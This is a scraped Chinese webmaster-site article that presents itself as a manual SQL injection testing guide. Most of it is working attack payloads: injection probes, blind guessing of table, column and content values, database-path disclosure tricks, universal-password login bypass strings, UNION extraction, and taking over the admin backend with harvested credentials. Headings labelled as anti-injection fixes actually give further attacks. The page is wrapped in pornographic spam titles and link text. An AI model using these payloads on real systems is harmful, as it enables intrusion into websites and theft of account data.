青草久久影院-青草久久伊人-青草久久久-青草久久精品亚洲综合专区-SM双性精跪趴灌憋尿调教H-SM脚奴调教丨踩踏贱奴

17站長網

17站長網 首頁 安全 腳本攻防 查看內容

手工注入方法,方便大家測試程序漏洞

2022-9-27 08:28| 查看: 2098 |來源: 互聯網

1、加入單引號 ’提交, 結果:如果出現錯誤提示,則該網站可能就存在注入漏洞。 2、數字型判斷是否有注入; 語句:and 1=1 ;and 1=2 (經典)、' and '1'=1(字符型) 結果:分別返回不同的頁面,說明存在注入漏洞. 分析
1、加入單引號 ’提交,
結果:如果出現錯誤提示,則該網站可能就存在注入漏洞。

2、數字型判斷是否有注入; 語句:and 1=1 ;and 1=2 (經典)、' and '1'=1(字符型)
結果:分別返回不同的頁面,說明存在注入漏洞.
分析:and 的意思是“和”如果沒有過濾我們的語句,and 1=1就會被代入SQL查詢語句進行查詢, 如果and前后的兩條語句都是真的話就不會出錯,但如果前后語句有一個為假的話,程序就會暴錯。 也就表明程序有注入漏洞

防注入解決辦法:
1>使用or 2>1 ; or 1>2來進行判斷
結果:分別返回不同的頁面,說明存在注入漏洞.
分析:or注入只要求前后兩個語句只要有一個正確就為真,如果前后兩個語句都是正確的,反而為假。 記住:or注入時,or后面的語句如果是正確的,則返回錯誤頁面!如果是錯誤,則返回正確頁面 ,說明存在注入點。

2> 使用xor 1=1; xor 1=2
結果:分別返回不同的頁面,說明存在注入漏洞.
分析:xor 代表著異或,意思即連接的表達式僅有一個為真的時候才為真。 記住:xor注入時,xor后面的語句如果是正確的,則返回錯誤頁面積,如果是錯誤,則返回正確 頁面,說明存在注入點。

3>把and 1=1轉換成URL編碼形式后在提交 and 1=1 URL編碼:%41%4E%44%20%%31%3D%31

4>使用-1;-0
分析:如果返回的頁面和前面不同,是另一則新聞,則表示有注入漏洞,是數字型的注入漏洞;在 URL地址后面加上 -0,URL變成 news.asp?id=123-0,返回的頁面和前面的頁面相同,加上-1,返回錯誤頁面,則也表示存在注入漏洞.

3、字符型判斷是否有注入:
語句:' and '1'=1;' and '1=2(經典)
結果:分別返回不同的頁面,說明存在注入漏洞.
分析:加入' and '1'=1返回正確頁面,加入' and '1=2返回錯誤頁面,說明有注入漏同。

防注入解決辦法:
在URL的地址后面加上'%2B'(字符型)
分析:URL地址變為:news.asp?id=123'%2B',返回的頁面和1同;加 上'2%2B'asdf,URL地址變為:news.asp?id=123'%2Basdf,返回的頁面和1 不同,或者說未發現該條記錄,或者錯誤,則表示存在注入點,是文本型的。

搜索型判斷是否有注入:
簡單的判斷搜索型注入漏洞存在不存在的辦法是先搜索',如果出錯,說明90%存在這個漏洞。然后搜索%,如果正常返回,說明95%有洞了。
說明:加入如"&"、"["、"]"、"%"、"$"、"@"等特殊字符,都可以實現,如果出現錯誤,說明有問題。
操作: 搜索一個關鍵字,比如2006吧,正常返回所有2006相關的信息,再搜索2006%'and 1=1 and '%'='和 2006%'and 1=2 and '%'=',存在異同的話,就是100%有洞了。關鍵字%' and 1=1 and '%'='% 關鍵字%' and 1=2 and '%'='% 將and 1=1 換成注入語句就可以了

判斷數據庫類型:
and user>0
例如:showdetail.asp?id=49 ;and user>0 如果是ACCESS數據庫,那么返回的錯誤里一般會有"Microsoft JET Database"關鍵定,如果是MSSQL數 據庫的話返回的錯誤提示里一般會含有"SQL Server"關鍵了.

猜表名 and exists (select * from 表名)
說明:意思與上面一樣,只是用的語名不一樣。

猜列名 and (select count(列名) from 表名)>0
說明:如果我們輸入的列名猜解正確否反回正常頁面

猜長度 and (select top 1 len(username) from admin)>0
說明:如果我們輸入的最后一位數據返回錯誤,而錯誤前一位數字返回正確,說明我所猜解的長度 為正確。

猜內容 and (select top 1 asc(mid(username,1,1)) from admin)>50 ascii碼1-128
說明:如果我們輸入的最后一位數據返回錯誤,而錯誤前一位數字返回正確,說明我所猜解的數字正確。(可以使用折半法猜內容)
折半法:最小值與最大值差的一半,比如輸入50返正確,輸入100返回錯誤,折半后輸入75。
兩種常見爆庫
1、%5c
2、conn.asp

%5c暴庫 把二級目錄中間的/換成%5c EY: otherweb ... s.asp?BigClassName=職 責范圍&BigClassType=1 如果你能看到:’E:\ahttc040901 \otherweb\dz\database\iXuEr_Studio.asa’不是一 個有效的 路徑。 確定路徑名稱拼寫是否正確, 以及是否 連接到文件存放的服務器。 這樣的就是數據庫了。下載時用FLASHGET換成.MDB格式的就行 .
conn.asp暴庫 這個也是比較老的漏洞,利用價值不大

常見的:'or'='or'萬能密碼登陸
’or’=’or’這是一個可以連接SQL的語名句.可以直接進入后臺。我收集了一下。類似的還有 : ’or’’=’ " or "a"="a ’) or (’a’=’a ") or ("a"="a or 1=1-- ’ or ’ a’=’a 一個很老的利用方法,主要用于一些比較老的網站。

聯合查詢注入(union查詢)
操作步驟:
1>在正常語句后臺加入 and 1=2 union select * form 表名,其中*號代表字段數量,從1一直追加 (and 1=2 union select 1,2,3,4 form 表名)如果字段數正確就會有暴錯
2>在頁面顯示數字的地方用真實得到的字段名代替,如:username,password.
3>在頁面字段值處暴出真實的數據庫字段值。

查找后臺地址,找到后臺用得到的用戶管理員的帳戶與密碼進行登陸.

建議大家先手工檢測,熟練掌握基本注入方法,來提高自己的基本注入知識。
警告:不要用做非法用途,不要做有損國家的任何事情!
本文最后更新于 2022-9-27 08:28,某些文章具有時效性,若有錯誤或已失效,請在網站留言或聯系站長:[email protected]
·END·
站長網微信號:w17tui,關注站長、創業、關注互聯網人 - 互聯網創業者營銷服務中心

免責聲明:本站部分文章和圖片均來自用戶投稿和網絡收集,旨在傳播知識,文章和圖片版權歸原作者及原出處所有,僅供學習與參考,請勿用于商業用途,如果損害了您的權利,請聯系我們及時修正或刪除。謝謝!

17站長網微信二維碼

始終以前瞻性的眼光聚焦站長、創業、互聯網等領域,為您提供最新最全的互聯網資訊,幫助站長轉型升級,為互聯網創業者提供更加優質的創業信息和品牌營銷服務,與站長一起進步!讓互聯網創業者不再孤獨!

掃一掃,關注站長網微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        主站蜘蛛池模板: 蜜臀AV中文字幕熟女人妻 | 日本阿v在线资源无码免费 日本阿v片在线播放免费 | 果冻传媒在线观看高清完整免费 | 亚洲人成人毛片无遮挡 | 久久亚洲黄色 | 高潮久久久久久久久不卡 | 久久这里都是精品 | 国产精品第1页 | 色婷婷AV99XX | 欧美最新色p图 | 国产精品久久久久久影院 | 亚婷婷洲AV久久蜜臀无码 | 久久亚洲午夜牛牛影视 | 亚洲精品视频在线播放 | 美女张开腿露出尿口扒开来摸动漫 | 92精品国产成人观看免费 | 午夜AV内射一区二区三区红桃视 | 美国ZOOM动物在线观看 | 肉肉的各种姿势高H细文 | 嫩草在线播放 | 亚洲中文字幕一二三四区苍井空 | 99久久婷婷国产麻豆精品电影 | 亚洲AV噜噜狠狠网址蜜桃尤物 | 亚洲欧美日韩精品久久奇米色影视 | 四虎影视国产精品亚洲精品hd | 欧美GV肉片视频免费观看 | 91亚洲精品福利在线播放 | 操中国老太太 | 黑人阴茎插女人图片 | 超碰免费视频caoporn | 性XXXXX搡XXXXX搡景甜 | 日本69xx 老师 | 国产免费看片 | 99热这里只有精品8 99热这里只有精品6 | 強姧伦久久久久久久久 | 欧美特级特黄a大片免费 | 亚洲国产中文字幕在线视频综合 | 伦理电影v男人天堂 | 在线观看国产日韩 | JK白丝校花爽到娇喘视频 | 美女张开腿让我了一夜 |